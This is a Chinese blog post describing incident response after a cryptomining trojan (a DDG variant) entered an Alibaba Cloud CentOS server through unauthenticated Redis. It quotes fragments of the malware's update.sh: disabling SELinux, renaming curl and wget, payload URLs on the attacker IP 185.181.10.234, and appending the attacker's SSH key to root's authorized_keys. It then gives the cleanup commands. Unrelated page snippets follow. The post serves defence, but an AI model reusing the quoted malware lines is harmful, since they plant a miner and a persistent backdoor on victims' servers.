记录阿里云被矿的解决方案

最新推荐文章于 2024-03-21 23:17:22 发布
最新推荐文章于 2024-03-21 23:17:22 发布
阅读量1.2k 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: 阿里云
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Playerunknown/article/details/104839541

阿里云centos被矿机病毒攻击

1 前言

操作系统:centos7

攻击者IP:185.181.10.234

image-20200306164033975

攻击者意图:开设后门,执行挖矿程序,并且设定定时任务

漏洞:redis 未设置密码,也没有授权访问。

阿里云警告信息

尊敬的****:云盾云安全中心检测到您的服务器:*.*.*.*(app)出现了紧急安全事件:挖矿程序,建议您立即登录云安全中心控制台-安全告警查看事件详情,并根据事件建议的方案进行处理。

云盾云安全中心,中的安全提示

image-20200306164348541

顺手百度了一下,发现该病毒信息如下。

发现这是一款在Linux/Windows双平台的挖矿病毒木马,该木马是通过Redis漏洞传播的挖矿木马DDG的变种,使用Go语言1.10编译使用了大量的基础库文件。该木马会大量消耗服务器资源,难以清除并具有内网扩散功能。

2 分离病毒信息:

定位病毒进程

指令命令top

top

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tj58AVfx-1584087564131)(https://i.loli.net/2020/03/13/1VYefM3gODqISmZ.png)]

发现 sysupdata 和 networkservice

占用了大量的系统资源,结合控制台的的报错信息,肯定没得跑了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-j40oi9rM-1584087564132)(https://i.loli.net/2020/03/13/4xdNBmCA3lYXRcg.png)]

(1)处理异常进程 sysupdate

​ a 获取进程位置

 ls -l /proc/15237/exe
 
 lrwxrwxrwx 1 root root  /proc/15237/exe -> /etc/sysupdat

b 关闭进程

kill -9 15237

c 删除文件

rm -f /etc/sysupdate

发现出错了

rm: cannot remove ‘/etc/sysupdate’: Operation not permitted

无法删除,看起来是做了保护的,可能是使用chattr命令对文件做了锁定

解除锁定再次尝试删除

chattr -i /etc/sysupdate
rm -f /etc/sysupdate

ok 删除成功

(2) 按照上面的流程删除 networkservice异常进程

删除定时任务

​ 查看定时任务

more /var/log/cron log | grep "update"
Oct 30 12:30:01 iabczwz93qwr9mrtmr CROND[31702]: (root) CMD (sh /etc/update.sh >/dev/null 2>&1)
Oct 30 13:10:01 iabczwz93qwr9mrtmr CROND[32719]: (root) CMD (sh /etc/update.sh )

发现有一个名为update.sh的异常脚本

好奇心下看了看脚本内容

vi /etc/update.sh

!/bin/sh
setenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur
miner_url="https://de.gsearch.com.de/api/sysupdate"
miner_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate"
miner_size="854364"
.....

可以看到它在这里做了好几件事,首先是往/etc目录下面下载以下文件:

  • /etc/config.json:挖矿配置文件,包含钱包地址与挖矿参数等;
  • /etc/sysupdate:XMR挖矿程序主体;
  • /etc/sysupdates:XMR挖矿程序主体备份;
  • /etc/sysguard:根据获取到的系统版本下载针对性Payload执行,包含通信模块用于监控并保证病毒的正常运行以及更新;
  • /etc/networkservice:漏洞检测模块,针对Redis、MSSQL、ThinkPHP、WebLogic等软件漏洞和系统漏洞扫描并入侵其他的主机;
  • /etc/update.sh:本脚本文件。

简单分析下/etc/update.sh文件,发现它做了以下事情:

  • 下载病毒模块;
  • 在kill_miner_proc函数中清除其他挖矿病毒;
  • 定时任务存活;
  • 为文件添加chattr锁定;
  • 修改IPTABLES;
  • 清除日志;
  • 关闭SELinux;
  • ……

还有个后门,创建/root/.ssh/authorized_keys,添加病毒作者自己的公钥,保证其可以使用SSH登录到服务器,具体代码如下:

...
chmod 700 /root/.ssh/
echo >> /root/.ssh/authorized_keys
chmod 600 root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keys
...

我们来查看下这个后门:

vi /root/.ssh/authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX root@u17

代码也看完了,删除了吧

执行命令

chattr -i /etc/update.sh
chattr -i /etc/config.json
chattr -i /etc/sysupdate
chattr -i /etc/sysupdates
chattr -i /etc/networkservice

rm -f /etc/update.sh
rm -f /etc/config.json
rm -f /etc/sysupdate
rm -f /etc/sysupdates
rm -f /etc/networkservice

chattr -i /root/.ssh/authorized_keys
rm -f /root/.ssh/authorized_keys

然后再阿里云的控制版本中,将他的IP封禁了,防止有看不到的后门。

任务完成

做五个实验,根据内容编写在优的代码
**My Coding Family**
02-05 996
以上是基于优平台实现的5个量化投资策略的代码框架,每个实验的核心策略逻辑在代码中都有体现,具体的因子、指标和策略可以根据实际需求进一步调整和优化。希望如上措施及解决方案能够帮到有需要的你。PS:如若遇到采纳如下方案还是未解决的同学,希望不要抱怨&&急躁,毕竟影响因素众多,我写出来也是希望能够尽最大努力帮助到同类似问题的小伙伴,即把你未解决或者产生新Bug黏贴在评论区,我们大家一起来努力,一起帮你看看,可以不咯。
去中心化的 S3,CESS 首创去中心化对象存储 DeOSS
CESS_Cloud的博客
05-21 1204
DeOSS 不仅能满足企业级非结构化数据存储需求,而且可以为企业提供高安全性、可扩展和隐私管理的高性能存储服务。
阿里云服务器被攻击(请及时排查告警中提示的恶意URL,以及所下载的目录下的恶意文件)
10年IT大头兵
05-04 1692
收到阿里云提醒被攻击了: URL链接:http://185.181.10.234/e5db0e07c3d7be80v520/init.sh netstat -anp |grepSYN_SENT ###如果这个命令查出来很多,那就是被攻击了 首先:改服务器登录密码,或者检查密钥文件是否被改过。这两个点都先检查并修改。这时重启服务器。我的因为刚被攻击,那边还连着,我不重启,他还是能操作。...
阿里云——云安全中心安全事件提醒:挖程序
iamcool345的博客
05-22 6037
近日收到云安全中心安全事件提醒,“出现了紧急安全事件:挖程序,建议您立即登录查看事件详情,并根据事件建议的方案进行处理。” 登录服务器后用top命令查看CPU利用率并不高,感觉不一定真是挖程序在作怪,或挖还没启动。用ps -ef命令列出进程,发现一个名为“httpdz”的可疑进程,杀死进程后,这个httpdz又立即启动。 查阅/etc/crontab、/etc/cron.d和/var/s...
上攻防-服务篇&弹性计算&数据库&实例元数据&控制角色&AK控制台接管
今天是几号的博客
10-12 2015
元数据解释:实例元数据(metadata)包含了弹性计算服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。(基本信息:实例ID、IP地址、网卡MAC地址、操作系统类型等信息。实例标识包括实例标识文档和实例标识签名,所有信息均实时生成,常用于快速辨别实例身份。各大元数据地址:阿里云元数据地址:http://100.100.100.200/腾讯元数据地址:http://metadata.tencentyun.com/
最新挖病毒xmrig清除方法和原理
m0_73140589的博客
03-21 7046
手机端接收短信提醒,服务器正遭受挖病毒攻击,服务器的cpu和内存占用高,阿里云不断告警
一次与“被机”的博弈过程
xiaomu_347的博客
12-11 895
一次与肉鸡的博弈过程
初识阿里云计算)--发展历程和技术架构、地域和可用区
Xucf1
01-10 1万+
文章目录一、初识阿里云1.概述2.阿里云log3.品牌口号4.计算价值二、阿里云整体架构1.阿里云发展历程2.阿里云技术架构3.地域和可用区三、端实践1.杭州城市大脑2.12306网站3.天弘基金与余额宝 一、初识阿里云 1.概述 阿里云,阿里巴巴集团旗下计算品牌,全球卓越的计算技术和服务提供商(计算及人工智能科技公司) 创立于2009年,在杭州、北京、硅谷等地设有研发中心和运营机构 80%以上从事技术类工作,境内累积申请技术专利百件以上 致力于打造公共、开放的以数据为中心的计算服务平台,借
基于阿里云服务器搭建私链并与SpringBoot项目进行交互
闻赤松之清尘,愿承风乎遗则的博客
12-05 1614
前言 这是区块链系列的第三篇,内容是在服务器上去搭建一条属于自己的以太坊私链,同时部署运行我们之前写好的demo,实现通信记录等等完整的操作,因为有过在Windows环境下搭建私链的经验,看起来并不难,但是,实际上,这里是让我消耗最多时间的地方!!!在这个过程中,真的是,大坑小坑不断,并且,我的目的是最终能真正跑起来,所以也需要去解决更多的问题 文章目录前言一:环境搭建搭建go环境geth的安装二...
博客被挖程序xmrig入侵以及我的解决方案(docker安全)
马赛琦的博客
09-03 8526
文章记录了一次由于Docker配置的漏洞导致的挖程序入侵的发现过程以及解决方案。由于本人时间有限,没有时间去深度学习linux的相关运维知识,所以解决方案可能是比较浅显的,还望您在阅读本文前知悉。 前言 2019年9月2日凌晨,我正准备关闭电脑睡觉,突然收到阿里云的一条短信,说是服务器被挖软件入侵了,一开始我是不相信的,就我这草履虫一样的网站,应该没有任何会来才对啊,后来查看了一下阿里云后...
服务器被植入脚本后导致cpu和内存飙升,疯狂连接185.181.10.234 并请求大量数据
lzh_2_4的博客
08-20 449
https://www.cnblogs.com/chbyiming-bky/articles/12654338.html
服务器可疑安全事件 警告:发现后门(Webshell)文件网站后门 手动处理流程
06-30 7154
服务器出现了可疑安全事件:包含WEBSHELL代码的日志/图片文件 处理流程
阿里云服务器中毒‘Kirito666’经历
06-20 1919
阿里云服务器中毒‘Kirito666’经历 尊敬的 xxx: 云安全中心检测到您的服务器服务器出现了紧急安全事件:恶意脚本代码执行 。 早上阿里就一直给我发来这样的消息,让我一脸懵逼,当时还没想到是被黑了。(学编程,但是对于这块区域还算是小白)。 但是阿里一直提醒我,并且强行给我限制了性能。 等到我去连我服务器上的数据库时,一直断,并且非常卡顿,我的伙伴也过来问我怎么了。 这个时候我感到不对劲了(因为我一直比较相信阿里,安全方面应该没事,就觉得没什么关系)。 这个时候我打开了我的xshell。打开d
阿里云ECS添加白名单
热门推荐
黑夜开发者的博客
01-02 1万+
通常在服务器的运维过程中,需要我们去配置阿里云的白名单,获得许可才能进行ssh或者ftp,下面就来操作一下。 1、首先进去管理控制台,找到安全组并进入。 2、找到安全组实例,点击配置规则。 3、选择公网入方向,点击添加规则。 4、百度一下我的ip,然后把自己的ip放到配置项中,这里比如我们要提供sftp服务,所以选择22/22端口。 5、配置好之后,点击确定,然后...
解决阿里云服务器提示挖程序风险
weixin_30820151的博客
12-15 879
    今天大早上收到阿里云邮件通知,提示有挖程序。一个激灵爬起来,折腾了一早上,终于解决问题了。   其实前两天就一直收到阿里云的通知,检测到对外攻击,阻断了对其他服务器6379、 6380和22端口的访问,当时没怎么当一回儿事,反正是我用来自己学习用的,就放着不管了,结果今天事态就大了。那就来解决吧。   首先xshell连接服务器,这时候输入命令时明显感觉巨卡。   肯定是cp...
阿里云服务器出现入侵事件:挖进程——pool.minexmr.com的解决办法
王天泽的博客
08-28 1万+
1.查看进程# ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid'找出CPU占有率高的你不认识的进程,我的是这样的bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3pa干掉它kill -9 111102.全局搜索这个进程[root@wangtianze ~]#
阿里云里面服务器怎么样可以更好的链接数据库
m0_64068722的博客
11-26 786
环境:阿里云ubuntu服务器 阿里云RDS数据库 问题:如何在阿里云服务器的终端使用shell命令连接RDS数据库 解决方法: 1.阿里云服务器安装MySQL sudo apt-get install mysql-server 如果出现unable to locate package mysql-server 先使用语句 sudo apt-get update 2.连接阿里云数据库 在阿里云服务器终端 mysql -u root -h RDS数据库连接地址 -p 按提示输入密..
假如说我的文件系统需要传输图片,视频,然后使用者有管理员,工,客户。工下时,会拍摄相片,视频,但是下时是没有网的,只有出了洞才有网。洞有ABCD四个区,然后图片视频放在四个区里面,说明区域的安全状况,这种情况下,mongoDB可以干什么?如果我要存储图片,视频,我是否还应该使用mongoDB数据库?还是直接使用服务器本身存储更方便,但是服务器本身存储好像不太安全。
最新发布
04-03
<think>嗯,用户的问题是关于在特定场景下使用MongoDB的可行性。他们有一个涉及工在无网络环境下拍摄照片和视频,之后上传到四个不同区的系统,用户角色包括管理员、工和客户。需要存储这些媒体文件,并管理区域的安全状况。用户还担心直接使用服务器存储的安全性。 首先,我需要明确用户的主要需求。他们需要处理离线环境下的数据上传,区域分类(ABCD四个区),角色权限管理,以及存储大量图片和视频。同时,他们关心存储方案的安全性和效率。 接下来,分析MongoDB的适用性。MongoDB适合存储元数据,比如文件信息、拍摄时间、所属区域、关联的工等。对于大文件,如视频和图片,通常建议使用对象存储服务,但用户可能对第三方服务有顾虑。这时候可以考虑MongoDB的GridFS,但需要权衡性能和成本。 然后,考虑离线同步的问题。工在无网时拍摄,之后上传,可能需要一个本地数据库暂存数据,联网后同步到主数据库。MongoDB有离线同步的解决方案,比如MongoDB Realm Sync,但需要确认是否适合工使用的设备环境。 安全方面,MongoDB支持加密和访问控制,可以设置不同角色的权限,如管理员管理区域数据,工只能上传,客户只能查看。同时,服务器本身存储可能不够安全,需要额外的安全措施,而MongoDB内置的安全功能可能更全面。 另外,区域安全状况的数据结构设计。每个区域可能需要存储安全指标、检查记录等,MongoDB的文档模型可以灵活地嵌套这些信息,方便查询和更新。 用户可能存在的深层需求包括系统的可扩展性,未来可能增加更多区域或用户角色,以及处理大量媒体文件的高效存储和检索。需要确保方案不仅能满足当前需求,还能适应未来的扩展。 最后,比较MongoDB存储文件和外部存储的优劣。直接使用服务器存储可能面临数据冗余、备份困难、安全性低的问题,而MongoDB GridFS或外部对象存储(如AWS S3)可以提供更好的可扩展性和安全性,但可能有成本开销。需要根据用户的具体资源和技术能力进行权衡。 总结下来,MongoDB适合管理元数据和区域安全数据,而大文件存储建议结合外部对象存储或GridFS,同时利用MongoDB的权限管理和同步功能来支持离线上传和角色权限控制。</think>--- ### **分步解答:MongoDB 在业文件系统中的应用分析** --- #### **1. 场景需求梳理** - **核心需求**: - 工在**无网络环境**下拍摄照片/视频,出后上传数据 - 文件需按洞区域(A/B/C/D)分类,记录安全状况 - 用户角色管理(管理员、工、客户) - 存储大量图片/视频文件,确保安全性与可追溯性 --- #### **2. MongoDB 的核心作用** ##### **(1)存储文件元数据与安全信息** - **元数据示例**: ```javascript // files 集合 { "_id": ObjectId("65d0c7f9e1a2c31b7c8f3d7d"), "type": "video", // 文件类型(photo/video) "mineArea": "B", // 所属洞区域 "safetyStatus": "高风险", // 安全评级(高风险/中风险/低风险) "capturedBy": "工123", // 拍摄者 "capturedAt": ISODate("2024-02-20T14:30:00Z"), "uploadedAt": ISODate("2024-02-20T18:00:00Z"), // 出后上传时间 "storagePath": "s3://bucket/areaB/video_20240220.mp4", // 实际文件存储路径 "tags": ["塌方预警", "设备损坏"] // 安全相关标签 } ``` - **优势**: - **灵活扩展字段**:动态添加安全指标(如温湿度、气体浓度) - **高效查询**:按区域、时间、安全状态快速检索文件 ```sql -- 查询洞B中所有高风险视频 db.files.find({ "mineArea": "B", "type": "video", "safetyStatus": "高风险" }) ``` ##### **(2)用户与权限管理** - **角色控制示例**: ```javascript // users 集合 { "_id": ObjectId("65d0c7f9e1a2c31b7c8f3d7c"), "role": "工", "permissions": [ "upload:photo", "upload:video", "view:self" // 仅查看自己上传的文件 ], "assignedAreas": ["A", "B"] // 负责的洞区域 } ``` --- #### **3. 文件存储方案对比** | **方案** | **适用场景** | **优缺点** | |------------------------|----------------------------------|---------------------------------------------------------------------------| | **MongoDB GridFS** | 文件大小 ≤ 16GB | ✅ 内置文件分块存储,元数据可扩展<br/>❌ 性能低于专业对象存储,成本较高 | | **外部对象存储** | 大文件(视频)、高频访问 | ✅ 高扩展性(如 AWS S3、阿里云 OSS)<br/>✅ 低成本<br/>❌ 需额外维护元数据关联 | | **服务器本地存储** | 小型系统、临时测试 | ✅ 部署简单<br/>❌ 单点故障风险高<br/>❌ 扩容困难,安全性差(需自行实现备份/加密) | ##### **推荐方案**: 1. **实际文件内容**:使用 **AWS S3 或阿里云 OSS** 存储图片/视频(低成本、高可用) 2. **元数据与关联**:用 MongoDB 记录文件路径、安全状态、区域分类 3. **离线同步逻辑**: - 工设备使用本地数据库(如 SQLite)暂存无网络时的拍摄记录 - 出后通过脚本将本地数据批量同步到 MongoDB 和对象存储 --- #### **4. 洞区域安全管理实现** ##### **数据结构设计**: ```javascript // mine_areas 集合 { "area": "B", "latestSafetyReport": { "timestamp": ISODate("2024-02-20T09:00:00Z"), "gasConcentration": 0.05, // 单位:ppm "temperature": 28.5, // 单位:℃ "riskLevel": "高风险", "inspector": "管理员001" }, "relatedMedia": [ // 关联的图片/视频 ObjectId("65d0c7f9e1a2c31b7c8f3d7d"), ObjectId("65d0c7f9e1a2c31b7c8f3d7e") ] } ``` ##### **功能实现**: - **安全状态看板**:聚合各区域最新数据 ```javascript db.mine_areas.aggregate([ { $sort: { "latestSafetyReport.timestamp": -1 } }, { $group: { _id: "$area", latestReport: { $first: "$latestSafetyReport" } }} ]) ``` - **区域关联文件查询**:通过 `relatedMedia` 字段快速定位文件 --- #### **5. 安全性增强措施** 1. **数据传输加密**: - 使用 HTTPS 上传文件,MongoDB 启用 TLS 连接 2. **存储加密**: - MongoDB 启用加密存储(WiredTiger 引擎支持静态加密) - 对象存储服务端加密(如 AWS S3 SSE-KMS) 3. **访问控制**: - 通过 MongoDB 角色限制客户只能读取特定字段: ```javascript db.createRole({ role: "client_role", privileges: [{ resource: { db: "mine_db", collection: "files" }, actions: ["find"] }], roles: [] }) ``` --- ### **6. 系统架构示意图** ``` [工设备] ├── 无网络时:本地存储拍摄记录(SQLite) └── 有网络时:同步数据到中心系统 │ ▼ [Node.js 同步服务] │ ├── [MongoDB] 存储元数据、用户、区域安全信息 │ └── [AWS S3] 存储图片/视频文件 ``` --- ### **总结建议** | **需求** | **推荐方案** | |-------------------------|----------------------------------| | 文件元数据与安全状态管理 | ✅ 必用 MongoDB | | 图片/视频文件存储 | ✅ 优先用对象存储(AWS S3/阿里云 OSS) | | 工离线数据同步 | ✅ MongoDB + 本地数据库同步脚本 | | 权限控制 | ✅ MongoDB 内置角色与字段级访问控制 | **最终结论**: MongoDB 是管理元数据、用户权限、区域安全信息的理想选择,但实际文件内容应搭配对象存储以提高性价比和可靠性,而非直接依赖服务器本地存储。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值